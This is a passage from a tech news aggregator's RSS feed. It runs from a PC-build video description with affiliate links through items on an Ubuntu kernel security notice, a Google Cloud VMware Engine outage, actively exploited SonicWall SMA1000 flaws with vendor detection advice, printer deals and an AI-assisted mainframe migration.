In this episode of my PC Build Series, I'll walk you through installing an ASUS ROG Ryujin III ARGB Extreme AIO cooler onto an AMD Ryzen 9 9950X system. We'll cover what an AIO actually is, why CPUs need cooling, proper airflow, radiator placement, thermal paste, fan orientation, pump installation, and how to connect everything correctly.<br />
<br />
Whether you're building your very first PC or just want to avoid common mistakes, this guide will help make liquid cooling a whole lot less scary.<br />
<br />
Support the channel!<br />
❤️ Patreon: https://patreon.com/shannonmorse<br />
⭐ Become a YouTube Member!<br />
<br />
#PCBuild #PCBuilding #CustomPC #LiquidCooling #AIO #ASUSROG #AMD #Ryzen9950X #GamingPC #TechTutorial<br />
<br />
https://www.ifixit.com/products/pro-tech-toolkit<br />
My build: https://pcpartpicker.com/user/snubsie/saved/#view=Htk84D <br />
<br />
📺<br />
Watch the Full PC Build Series: https://www.youtube.com/playlist?list=PLeYHKbaShxTHQVUHZfM8_44pjyI9LLzfe<br />
<br />
* Parts List (and best deals!) // Affiliate links:<br />
- Prices may differ<br />
CPU: AMD Ryzen 9 9950X 4.3 GHz 16-Core Processor ($519.00 @ Amazon)<br />
Amazon: https://amzn.to/3O70PIU<br />
Best Buy: https://bestbuycreators.7tiv.net/YRWkZq<br />
B&H: https://bhpho.to/3PjZZcr<br />
<br />
CPU Cooler: Asus ROG Ryujin III ARGB Extreme 89.73 CFM Liquid CPU Cooler ($389.99 @ Amazon)<br />
Amazon: https://amzn.to/4bkdodD<br />
Best Buy: (similar option) https://bestbuycreators.7tiv.net/DyDM4q<br />
B&H: https://bhpho.to/46EWdR4<br />
<br />
Motherboard: Asus ROG STRIX X870-A GAMING WIFI ATX AM5 Motherboard ($234.99 @ Amazon)<br />
Amazon: https://amzn.to/3NI9tO0<br />
Best Buy: (similar option) https://bestbuycreators.7tiv.net/bORgn6<br />
B&H: https://bhpho.to/4ubyfa7<br />
<br />
Memory: Kingston FURY Beast RGB 64 GB (2 x 32 GB) DDR5-6400 CL32 Memory ($1359.99 @ Newegg - OOS) x 2<br />
Amazon: https://amzn.to/49SZug7<br />
Best Buy: (similar option) https://bestbuycreators.7tiv.net/2anB4G<br />
<br />
Storage: Kingston NV3 2 TB M.2-2280 PCIe 4.0 X4 NVME Solid State Drive ($311.99 @ Amazon)<br />
Amazon: https://amzn.to/4bSOyBO<br />
Best Buy: https://bestbuycreators.7tiv.net/vPeg7N<br />
B&H: https://bhpho.to/4bpm9m9<br />
<br />
Storage: Kingston FURY Renegade G5 2.048 TB M.2-2280 PCIe 5.0 X4 NVME Solid State Drive ($424.99 @ iBUYPOWER)<br />
Amazon: https://amzn.to/4pTv8QB<br />
Best Buy: https://bestbuycreators.7tiv.net/N9AYrN<br />
B&H: https://bhpho.to/40dqbYK<br />
<br />
Video Card: Asus TUF GAMING OC GeForce RTX 5080 16 GB Video Card ($1699.99 @ B&H)<br />
Amazon: https://amzn.to/3NNmKos<br />
Best Buy: https://bestbuycreators.7tiv.net/GKrYLB<br />
B&H: https://bhpho.to/46HyuQb<br />
<br />
Case: Asus A31 ATX Mid Tower Case ($64.98 @ Amazon)<br />
Amazon: https://amzn.to/4bTH8yd<br />
Best Buy: (similar option) https://bestbuycreators.7tiv.net/7a3BZO<br />
Newegg: https://click.linksynergy.com/link?id=qn*xL%2FagfY4&offerid=1786142.445837726262477428148556&type=2&murl=https%3A%2F%2Fwww.newegg.com%2Fasus-atx-mid-tower-a31-tg-steel-plastic-tempered-glass-computer-case-white%2Fp%2FN82E16811173067%3Fitem%3DN82E16811173067<br />
B&H: https://bhpho.to/4d3Fyu8<br />
<br />
Power Supply: Asus TUF Gaming 1000G 1000 W 80+ Gold Certified Fully Modular ATX Power Supply ($179.99 @ Amazon)<br />
Amazon: https://amzn.to/4qSDWHG<br />
Best Buy: (similar option) https://bestbuycreators.7tiv.net/LKeYQO<br />
Newegg: https://click.linksynergy.com/link?id=qn*xL%2FagfY4&offerid=1786142.445835163683945762036176&type=2&murl=https%3A%2F%2Fwww.newegg.com%2Fasus-atx-3-0-compatible-atx12v-1000-w-80-plus-gold-certified-power-supply-tuf-gaming-1000g%2Fp%2FN82E16817320029%3Fitem%3DN82E16817320029<br />
B&H: https://bhpho.to/3N1pqPq<br />
<br />
Case Fan: Asus TUF GAMING TF120 ARGB White 76 CFM 120 mm Fan ($14.99 @ Amazon)<br />
Amazon: https://amzn.to/3YWIbG7<br />
Best Buy: https://bestbuycreators.7tiv.net/QjVx5z<br />
Newegg: https://click.linksynergy.com/link?id=qn*xL%2FagfY4&offerid=1786142.4458310460165103099108139&type=2&murl=https%3A%2F%2Fwww.newegg.com%2Fasus-tuf-gaming-tf120-argb-white-case-fan%2Fp%2FN82E16835101094%3Fitem%3DN82E16835101094<br />
B&H: https://bhpho.to/4uaSzs9<br />
<br />
Case Fan: Asus TUF Gaming TR120 ARGB 77.4 CFM 120 mm Fans 3-Pack ($68.54 @ Amazon)<br />
Amazon: https://amzn.to/4rzKNpN<br />
Best Buy: https://bestbuycreators.7tiv.net/55OBVD<br />
Newegg: https://click.linksynergy.com/link?id=qn*xL%2FagfY4&offerid=1786142.4458310460165103099108139&type=2&murl=https%3A%2F%2Fwww.newegg.com%2Fasus-tuf-gaming-tf120-argb-white-case-fan%2Fp%2FN82E16835101094%3Fitem%3DN82E16835101094<br />
B&H: https://bhpho.to/46KcvYO<br />
<br />
<br />
<br />
<br />
Today's Goal<br />
00:43 Why CPUs Need Cooling<br />
02:01 What Is an AIO Cooler?<br />
03:05 Understanding the Parts<br />
04:14 Patreon Shoutout<br />
05:02 Airflow Basics<br />
06:39 Radiator Placement<br />
07:43 Installing the Fans<br />
10:07 Installing the Radiator<br />
11:48 Thermal Paste Explained<br />
13:02 Installing the CPU Block<br />
14:49 Pump & Fan Connections<br />
16:06 Build Progress Review<br />
16:54 Next Episode Preview<br />
<br />
<br />
Editor: @ColleenEdits<br />
<br />
😍 FTC DISCLAIMER 😍<br />
Affiliate links listed above allow me to receive a small commission. <br />
Code of Ethics:<br />
https://www.morsecodecreative.com/code-of-ethics<br />
<br />
FTC: Links marked with * are affiliate links<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8548-1: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw is known as Fragnesia. A local attacker could use this to escalate
privileges, or possibly escape a container. (CVE-2026-43503)

Several security issue...]]></description>
<link>https://tsecurity.de/de/3670588/unix-server/usn-8548-1-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670588/unix-server/usn-8548-1-linux-kernel-vulnerabilities/</guid>
<pubDate>Wed, 15 Jul 2026 14:16:39 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw is known as Fragnesia. A local attacker could use this to escalate
privileges, or possibly escape a container. (CVE-2026-43503)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - SCSI subsystem;
  - Thermal drivers;
  - USB over IP driver;
  - File systems infrastructure;
  - Ext4 file system;
  - Network file system (NFS) server daemon;
  - SMB network file system;
  - Tracing infrastructure;
  - B.A.T.M.A.N. meshing protocol;
  - Ceph Core library;
  - DCCP (Datagram Congestion Control Protocol);
  - IPv4 networking;
  - IPv6 networking;
  - Netfilter;
  - RxRPC session sockets;
  - X.25 network layer;
(CVE-2021-47117, CVE-2021-47202, CVE-2023-52646, CVE-2024-56643,
CVE-2026-23455, CVE-2026-31402, CVE-2026-31607, CVE-2026-31637,
CVE-2026-31659, CVE-2026-31685, CVE-2026-43011, CVE-2026-43037,
CVE-2026-43038, CVE-2026-43383, CVE-2026-43407, CVE-2026-43414,
CVE-2026-45988, CVE-2026-46119, CVE-2026-46243)]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Cloud configuration update disrupts VMware Engine stretched clusters]]></title>
<description><![CDATA[A faulty configuration update on Google Cloud VMware Engine (GCVE) caused a multi-region disruption on Tuesday, disrupting inter-zone connectivity across three regions.



The incident, which lasted for over ten hours, began at 5:00 PM UTC on July 14 and was resolved by 04:46 AM UTC on July 15. I...]]></description>
<link>https://tsecurity.de/de/3670376/it-security-nachrichten/google-cloud-configuration-update-disrupts-vmware-engine-stretched-clusters/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670376/it-security-nachrichten/google-cloud-configuration-update-disrupts-vmware-engine-stretched-clusters/</guid>
<pubDate>Wed, 15 Jul 2026 12:53:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A faulty configuration update on Google Cloud VMware Engine (GCVE) caused a multi-region disruption on Tuesday, disrupting inter-zone connectivity across three regions.</p>



<p class="wp-block-paragraph">The incident, which lasted for over ten hours, began at 5:00 PM UTC on July 14 and was resolved by 04:46 AM UTC on July 15. It affected VMware Engine stretched clusters in Sydney (australia-southeast1), Melbourne (australia-southeast2), and Frankfurt (europe-west3). </p>



<p class="wp-block-paragraph">Google later identified a recent network configuration update as the cause of the inter-zone network disruption and mitigated the issue by rolling back the faulty configuration to its last-known configuration.</p>



<h2 class="wp-block-heading">Google traces the fault</h2>



<p class="wp-block-paragraph">The first status update, posted at 08:24 PM UTC on July 14, described the incident as a network connectivity issue affecting stretched clusters, while compute and storage services remained unaffected. At that time, GCVE VMs were running as expected, but the company acknowledged that customers may experience connectivity issues with the VMs. </p>



<p class="wp-block-paragraph">But soon after, the preliminary investigation indicated that the issue could be stemming from an underlying network connectivity issue affecting the infrastructure that links the zones within a stretch cluster. </p>



<p class="wp-block-paragraph">“This disruption is causing synchronization issues between the affected zones, and some GCVE customers using Stretched Cluster may experience inter-site communication failures to their GCVE environments within the affected zones,” Google Cloud said in a notification.</p>



<p class="wp-block-paragraph">While the company was working on restoring full connectivity, Google advised moving workloads to the healthy side of the stretched cluster, where feasible, and only after consulting Google Support.</p>



<p class="wp-block-paragraph">Less than two hours after the first update, Google Cloud identified underlying inter-zone communication failures and <a href="https://www.networkworld.com/article/969572/bgp-what-is-border-gateway-protocol-and-how-does-it-work.html?utm=hybrid_search">Border Gateway Protocol (BGP)</a> session flapping between cluster zones. “Specifically, network connectivity has been lost between the affected zones and the witness appliance. Because the witness appliance is currently unreachable, the cluster zones are unable to safely synchronize state. As a result, VMs on the affected sites are becoming isolated and may be left without writable data,” noted the company. </p>



<p class="wp-block-paragraph">And at 11:05 PM UTC, it posted that the investigation has identified a recent configuration update that is the likely cause of the inter-zone network disruption, and at 04:46 AM UTC on July 15, the engineering team mitigated the issue by rolling back the faulty configuration to its last-known good value.</p>



<p class="wp-block-paragraph">“Google made a network setting change that accidentally broke the connection between the two data center zones in VMware Engine. The <a href="https://www.networkworld.com/article/969185/what-is-a-virtual-machine-and-why-are-they-so-useful.html?utm=hybrid_search">virtual machines</a> themselves kept running fine, but nobody could reach them, and there was a risk that some machines might lose the ability to save data properly. This indicates that even managed cloud infrastructure can experience failures in critical shared network components,” said Pareekh Jain, CEO at  EIIRTrend &amp; Pareekh Consulting.</p>



<p class="wp-block-paragraph">Neil Shah, vice president at Counterpoint Research, said the real culprit here is the SDN orchestration control plane, where a routine internal network update or configuration tweak introduced routing failure across multiple zones. “While most of the physical nodes are distributed for exactly this redundancy purpose, they are still tightly coupled to a singular shared orchestration fabric, so if that control plane crashes, then everything comes crashing down, and the physical distributed nodes become irrelevant.”</p>



<h2 class="wp-block-heading">Stretched clusters fall short</h2>



<p class="wp-block-paragraph">Although the outage did not bring down virtual machines, the incident undermined the primary reason enterprises deploy stretched clusters.</p>



<p class="wp-block-paragraph">“Stretched clusters are designed to keep applications running if one site fails. When the network connecting the two sites is disrupted, that resilience breaks down, leaving workloads inaccessible despite healthy compute and storage. The incident shows that network infrastructure can become a single point of failure,” highlighted Jain.</p>



<p class="wp-block-paragraph">Jain noted companies use this setup specifically for their most important systems, the ones that can’t afford to go offline, like hospital records, banking systems, or company databases. A 12-hour outage on systems like that can mean lost money, missed deadlines, angry customers, and in some industries, legal or regulatory trouble.</p>



<h2 class="wp-block-heading">Rethinking resilience</h2>



<p class="wp-block-paragraph">The incident also highlights that deploying stretched clusters alone does not eliminate dependency on the cloud provider’s underlying networking and control plane.</p>



<p class="wp-block-paragraph">“If CIOs are looking to achieve absolute <a href="https://www.networkworld.com/article/4137371/digital-sovereignty-options-for-on-prem-deployments.html?utm=hybrid_search">digital sovereignty</a>, mission-critical production data must be decoupled from the automation layer. The asynchronous geo-separation with multi-cloud deployment could be a more viable strategy to avoid a single systematic point of failure,” added Shah. </p>



<p class="wp-block-paragraph">Jain added that leaders should ask their cloud provider exactly what parts are shared versus separate, keep a true backup plan outside that same provider for their most critical systems, regularly test what happens if the provider’s systems fail, and make sure contracts account for compensation if this happens again.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Adds SonicWall SMA1000 Vulnerabilities to KEV Catalog Following Active Exploitation]]></title>
<description><![CDATA[Security researchers have identified two critical vulnerabilities, CVE-2026-15409 and CVE-2026-15410, affecting SonicWall SMA1000 Series appliances. The flaws are already being exploited in the wild, prompting urgent warnings from SonicWall and CISA. Successful exploitation could result in Remote...]]></description>
<link>https://tsecurity.de/de/3670179/it-security-nachrichten/cisa-adds-sonicwall-sma1000-vulnerabilities-to-kev-catalog-following-active-exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670179/it-security-nachrichten/cisa-adds-sonicwall-sma1000-vulnerabilities-to-kev-catalog-following-active-exploitation/</guid>
<pubDate>Wed, 15 Jul 2026 11:35:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1208" height="713" src="https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="CVE-2026-15409" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409.webp 1208w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-300x177.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-1024x604.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-768x453.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-600x354.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-150x89.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-750x443.webp 750w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-1140x673.webp 1140w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409.webp 1208w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-300x177.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-1024x604.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-768x453.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-600x354.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-150x89.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-750x443.webp 750w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-15409-1140x673.webp 1140w" sizes="(max-width: 1208px) 100vw, 1208px" title="CISA Adds SonicWall SMA1000 Vulnerabilities to KEV Catalog Following Active Exploitation 1"></p><span data-contrast="auto">Security researchers have identified two critical vulnerabilities, CVE-2026-15409 and CVE-2026-15410, affecting SonicWall SMA1000 Series appliances. The flaws are already being exploited in the wild, prompting urgent warnings from SonicWall and CISA. Successful exploitation could result in Remote Code Execution, bypass of security restrictions, and broader compromise of affected systems.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28981">vulnerabilities</a> impact SonicWall SMA1000 models 6210, 7210, and 8200v running versions 12.4.3-03245, 12.4.3-03387, 12.4.3-03434 (platform-hotfix), 12.5.0-02283, 12.5.0-02624, and 12.5.0-02800 (platform-hotfix).</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">CVE-2026-15409 and CVE-2026-15410 Explained</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">CVE-2026-15409 is a server-side request forgery (SSRF) <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28979">vulnerability</a> in the SMA1000 Appliance Work Place interface. According to SonicWall, an unauthenticated remote attacker could force the appliance to send requests to unintended locations. The flaw carries a CVSS v3 score of 10.0 with the vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H and is mapped to CWE-918.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">CVE-2026-15410 is a post-authentication code injection vulnerability in the SMA1000 Appliance Management Console (AMC). Under specific conditions, a remote authenticated attacker with <a href="https://thecyberexpress.com/cyberattacks-on-south-korea-military/" target="_blank" rel="noopener">administrator privileges</a> could execute arbitrary operating system commands, enabling Remote Code Execution. The vulnerability has a CVSS score of 7.2, uses the vector CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H, and is associated with CWE-94.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Active Exploitation and Impact</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">SonicWall <a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008" target="_blank" rel="nofollow noopener">confirmed</a> that CVE-2026-15409 and CVE-2026-15410 are being actively exploited. The advisory states, "SonicWall PSIRT has investigated multiple cases indicating the active exploitation of the vulnerabilities described in this advisory. Customers are strongly urged to upgrade to the hotfix release as soon as possible to remediate these vulnerabilities."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The vulnerabilities may allow Remote Code Execution and bypass of <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28980">security</a> restrictions, increasing the risk of unauthorized system access.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Fixed Versions and Detection Guidance</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">SonicWall has released fixes in 12.4.3-03453 (platform-hotfix) and later, and 12.5.0-02835 (platform-hotfix) and later. The company noted that these issues do not affect SSL-VPN running on SonicWall firewalls or the SMA 100 Series product line.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Administrators are advised to inspect extraweb_access.log for HTTP 200 requests to /api/login or /api/logout, suspicious /wsproxy requests returning HTTP 101, ctrl-service.log entries indicating hotfix rollbacks with path traversal names, and unauthorized /api/login or /api/logout routes in /var/lib/unit/conf.json.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">If indicators of compromise are found, SonicWall recommends re-imaging hardware appliances or redeploying virtual appliances, changing user and <a href="https://thecyberexpress.com/apache-syncope-cve-2025-65998-flaw/" target="_blank" rel="noopener">administrator passwords</a>, and resetting TOTP tokens after performing a forensic investigation.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The advisory, SNWLID-2026-0008, was first published and last updated on July 14, 2026. The vulnerabilities were internally discovered by Adam Babis of SonicWall PSIRT, while Sean Koessel and Steven Adair of Volexity were credited in Version 1.1 for helping identify an additional indicator of compromise during the investigation. On the same day, CISA added the vulnerabilities to its Known Exploited Vulnerabilities Catalog.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Recommend Leaving Your VPN Enabled Most of the Time. Here’s How and When I Use a VPN]]></title>
<description><![CDATA[The answer is usually yes, right up until your bank and printer disagree.]]></description>
<link>https://tsecurity.de/de/3668951/it-nachrichten/i-recommend-leaving-your-vpn-enabled-most-of-the-time-heres-how-and-when-i-use-a-vpn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668951/it-nachrichten/i-recommend-leaving-your-vpn-enabled-most-of-the-time-heres-how-and-when-i-use-a-vpn/</guid>
<pubDate>Tue, 14 Jul 2026 21:03:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The answer is usually yes, right up until your bank and printer disagree.]]></content:encoded>
</item>
<item>
<title><![CDATA[Bambu Lab A2L review: This 3D printer makes large-format printing look easy]]></title>
<description><![CDATA[Finally, this is the larger version of the highly popular Bambu Lab A1. The machine is essentially very similar, with a few technology upgrades, but ultimately it is just an oversized version of the old machine, with a solid belt that ensures superb-quality multi-filament printing that will suit ...]]></description>
<link>https://tsecurity.de/de/3668823/it-nachrichten/bambu-lab-a2l-review-this-3d-printer-makes-large-format-printing-look-easy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668823/it-nachrichten/bambu-lab-a2l-review-this-3d-printer-makes-large-format-printing-look-easy/</guid>
<pubDate>Tue, 14 Jul 2026 19:46:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Finally, this is the larger version of the highly popular Bambu Lab A1. The machine is essentially very similar, with a few technology upgrades, but ultimately it is just an oversized version of the old machine, with a solid belt that ensures superb-quality multi-filament printing that will suit the vast majority of hobby and enthusiast printing with basic filament such as PLA.]]></content:encoded>
</item>
<item>
<title><![CDATA[The 'absolutely superb' Bambu Lab P2S we tested in our workshop just dropped in price]]></title>
<description><![CDATA[We called this CoreXY 3D printer "exceptionally refined" after our our workshop tests.]]></description>
<link>https://tsecurity.de/de/3668538/it-nachrichten/the-absolutely-superb-bambu-lab-p2s-we-tested-in-our-workshop-just-dropped-in-price/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668538/it-nachrichten/the-absolutely-superb-bambu-lab-p2s-we-tested-in-our-workshop-just-dropped-in-price/</guid>
<pubDate>Tue, 14 Jul 2026 18:04:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We called this CoreXY 3D printer "exceptionally refined" after our our workshop tests.]]></content:encoded>
</item>
<item>
<title><![CDATA[HP's LaserJet Pro 4000 Series is 'one of the fastest laser printers' in its class with blistering 42ppm speeds — and it just got a major price cut]]></title>
<description><![CDATA[A dependable mono laser printer built for high-volume printing with expandable paper capacity and reliable networking in busy offices.]]></description>
<link>https://tsecurity.de/de/3668051/it-nachrichten/hps-laserjet-pro-4000-series-is-one-of-the-fastest-laser-printers-in-its-class-with-blistering-42ppm-speeds-and-it-just-got-a-major-price-cut/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668051/it-nachrichten/hps-laserjet-pro-4000-series-is-one-of-the-fastest-laser-printers-in-its-class-with-blistering-42ppm-speeds-and-it-just-got-a-major-price-cut/</guid>
<pubDate>Tue, 14 Jul 2026 15:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A dependable mono laser printer built for high-volume printing with expandable paper capacity and reliable networking in busy offices.]]></content:encoded>
</item>
<item>
<title><![CDATA[Deluxe Corporation beats the odds with mainframe migration using AI]]></title>
<description><![CDATA[Deluxe may have prevailed against the odds when it successfully migrated from a 50-plus-year-old mainframe recently.



The company was able to move from it to a cloud environment in about 12 months without a major hitch, and while AI did some of the heavy lifting. The save will amount to about $...]]></description>
<link>https://tsecurity.de/de/3667450/it-nachrichten/deluxe-corporation-beats-the-odds-with-mainframe-migration-using-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667450/it-nachrichten/deluxe-corporation-beats-the-odds-with-mainframe-migration-using-ai/</guid>
<pubDate>Tue, 14 Jul 2026 11:32:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Deluxe may have prevailed against the odds when it successfully migrated from a 50-plus-year-old mainframe recently.</p>



<p class="wp-block-paragraph">The company was able to move from it to a cloud environment in about 12 months without a major hitch, and while AI did some of the heavy lifting. The save will amount to about $4.9 million a year by retiring old hardware and software, cutting labor costs, and consolidating IT resources.</p>



<p class="wp-block-paragraph">Deluxe, based in Minneapolis and traditionally known as a check printer, has transformed itself into a payments IT provider in recent years. But it desperately needed to end its reliance on its ancient mainframe, says <a href="https://www.linkedin.com/in/yogaraj/">Yogaraj Jayaprakasam</a>, the company’s chief technology and digital officer, pictured.</p>



<p class="wp-block-paragraph">So AI played a huge role in the IT modernization project, he says, using it to rewrite the old mainframe code, generate documentation, and regenerate code test cases. The company also used an AI-powered test automation suite, as well as AI tools to help move assets to the new cloud environment.</p>



<p class="wp-block-paragraph">While AI can’t do everything during mainframe migration, it can make the move easier, Jayaprakasam says. “The biggest lessons learned is AI is one of the missing tools in your transformation tool set,” he adds.</p>



<h2 class="wp-block-heading">Failing projects</h2>



<p class="wp-block-paragraph">Deluxe’s mainframe migration earned it a <a href="https://www.cio.com/article/220017/us-cio-100-winners-celebrating-it-innovation-and-leadership.html">2026 CIO 100 Award</a> for IT innovation and leadership, but it also seems to have bucked a recent trend. Many mainframe migration projects haven’t gone as planned, and <a href="https://www.gartner.com/en/newsroom/press-releases/2026-06-18-gartner-predicts-more-than-70-percent-of-mainframe-exit-projects-will-fail-due-to-overestimation-of-generative-ais-capabilities">Gartner recently predicted</a> that more than 70% of mainframe exit projects that started in 2026 will fail to produce intended benefits because of an overreliance on gen AI.</p>



<p class="wp-block-paragraph">Mainframe transformation projects tend to work better when they’re part of a larger business transformation rather than a one-off project using gen AI to do most of the work, says Gartner analyst <a href="https://www.gartner.com/en/experts/alessandro-galimberti">Alessandro Galimberti</a>.</p>



<p class="wp-block-paragraph">“Generative AI and agentic AI are extremely powerful, but they also have their own limits,” he says. “With all these kinds of tools trying to convert code or somehow fit into a non-mainframe workload, we don’t really see a track record of success.”</p>



<p class="wp-block-paragraph">Gartner also sees a declining interest in mainframe migration projects, Galimberti says. With mainframes getting support from several IT vendors, and with a general lack of migration success, many companies are choosing to keep many workloads on their existing big iron.</p>



<p class="wp-block-paragraph">But mainframes also have a proven track record of very high uptime and backward capability, Galimberti says.</p>



<p class="wp-block-paragraph">“If I’m a bank, a financial institution, or a transportation company, I need to run applications that are the core of my business,” he adds. “I need reliability, transactional integrity, and security, and these applications have a low change rate over the years because they map very stable business processes.”</p>



<p class="wp-block-paragraph">The Gartner prediction makes sense to <a href="https://www.linkedin.com/in/john-mckenny-994446/">John McKenny</a>, senior VP and GM of Intelligent Z optimization and transformation for mainframe support vendor BMC Software.</p>



<p class="wp-block-paragraph">“With organizations thinking about mainframe exits, the expected benefits they’re looking for are usually pretty straightforward,” he says. “They think, ‘It’s going to be lower cost, I’m going to get equal or better capabilities, I should be more agile.’  The reality is those outcomes rarely show up at scale.”</p>



<p class="wp-block-paragraph">Mainframe migration is possible, but the successful projects tend to be small scale, McKenny adds. He was on a recent call about a failed migration project in Europe, with a large bank cancelling the project at the end of 2025 and recommitting to the mainframe as a strategic platform.</p>



<p class="wp-block-paragraph">“I’ve never seen a large-scale mainframe migration project finish under budget, ever,” he says. “Most of the projects I hear about fail outright.”</p>



<h2 class="wp-block-heading">Trying again</h2>



<p class="wp-block-paragraph">Like some organizations that Gartner has observed, Deluxe tried to move away from its mainframe several years ago, but the project failed, Jayaprakasam says. Yet the company took the steps it needed this time to ensure the new migration succeeded.</p>



<p class="wp-block-paragraph">While a mainframe migration isn’t for every organization, the latest move made sense for Deluxe, he says.</p>



<p class="wp-block-paragraph">The mainframe, after all, was the backbone for a large portion of the company’s annual revenue, and interfaces with several top banks across North America. The modernization effort rebuilt core business processes and data, moving them from the mainframe to a modern cloud-native technology stack, including Salesforce, Mulesoft, and SAP S4/HANA.</p>



